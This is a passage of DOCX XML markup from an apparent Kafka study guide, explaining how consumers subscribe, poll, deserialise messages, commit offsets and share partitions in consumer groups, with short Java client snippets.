          <w:p w14:paraId="7C1B23BF" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE"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Offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38374B94" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE"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Position of message in a partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="3D4554F6" w14:textId="77777777" w:rsidTr="00BC62CE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1129E298" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE"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Consumer Group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EE689E8" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE"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Multiple consumers cooperate to read messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="752E2CE1" w14:textId="77777777" w:rsidTr="00BC62CE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27D92661" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE"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Polling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50A215E1" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE"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Consumers explicitly poll Kafka for messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="5CF1C8D2" w14:textId="77777777" w:rsidTr="00BC62CE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="077CB345" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Partition Assignment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55F61789" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E51096">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Kafka distributes partitions among group members</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42B20944" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BC62C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59A58E7">
          <v:rect id="_x0000_i3112" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEDB20A" w14:textId="13B033AD" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="007C61B8" w:rsidP="007C61B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="773" w:name="_Toc196308253"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Describe the Kafka consumer role and how it reads messages from topics and manages offsets?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="773"/>
    </w:p>
    <w:p w14:paraId="0B710640" w14:textId="29810432" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Here's a clear explanation of the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Consumer role</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, how it </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reads messages</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and how it </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manages offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A09846B" w14:textId="77777777" w:rsidR="00651890"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6C0C224">
          <v:rect id="_x0000_i3113" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A29B512" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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lastRenderedPageBreak/>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kafka Consumer Role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D142FDC" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is responsible for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7CC6DE" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1303"/>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Subscribing</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to one or more Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE5F21E" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1303"/>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Polling</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data (messages/events) from assigned partitions of those topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0386169C" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1303"/>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Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1E0A81" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1303"/>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Committing offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to track the progress of message consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D85DAAA" w14:textId="77777777" w:rsidR="00651890"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BE4B792">
          <v:rect id="_x0000_i3114" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1322A9DD" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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How Kafka Consumer Reads Messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DB51BC" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1304"/>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Subscription to Topics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDB79F3" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1304"/>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The consumer uses the subscribe() method to register interest in one or more topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E26B9F" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1304"/>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consumer.subscribe(Collections.singletonList("user-events"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06476E7C" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1304"/>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Polling Messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D66359A" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1304"/>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The consumer polls Kafka for new data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55235BBE" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1304"/>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Kafka returns records from the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>assigned partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4883592C" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1304"/>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ConsumerRecords&lt;String, String&gt; records = consumer.poll(Duration.ofMillis(100));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7200BBF5" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1304"/>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Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21379114" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1304"/>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Kafka deserializes the key and value using configured deserializers (e.g., StringDeserializer, JsonDeserializer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC57578" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1304"/>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Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11386832" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1304"/>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The application processes each record (key-value pair) one by one or in batches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C01F359" w14:textId="77777777" w:rsidR="00651890"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063235F">
          <v:rect id="_x0000_i3115" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E1651D" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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Offset Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF0E3D3" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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What is an Offset?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A60EAC5" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1305"/>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An </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a unique ID assigned to each record within a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231B6E98" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1305"/>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It's a marker for the consumer: “What’s the next message to read?”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6E8DB0" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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Offset Commit Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223E9C4A" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1306"/>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Automatic Commit</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FE8664" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1306"/>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Enabled by enable.auto.commit=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D769D6A" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1306"/>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Kafka automatically commits the latest offset at intervals (default: 5 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A81EBB6" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1306"/>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Not suitable for reliable processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753C76DC" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1306"/>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Manual Commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA8DCA5" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1306"/>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Developer has full control over when to commit the offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08257033" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1306"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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consumer.commitSync(); // synchronously commit the offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4E083B" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1306"/>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Safer, especially in failure scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9E7FA7" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1306"/>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Commit Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E93D055" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1306"/>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commitSync() – waits for broker acknowledgment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AC1C3B" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1306"/>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commitAsync() – commits in the background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C3C49F" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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Best Practice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315AE2A7" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manual offset commit</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> after the message has been successfully processed, to ensure </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>at-least-once delivery</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B5E0CF" w14:textId="77777777" w:rsidR="00651890"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650CA5C">
          <v:rect id="_x0000_i3116" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7E2B43" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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Consumer Groups and Partition Assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254E5673" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1307"/>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Consumers in the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same group</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> share topic partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49573A97" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1307"/>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Kafka assigns </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one partition to one consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
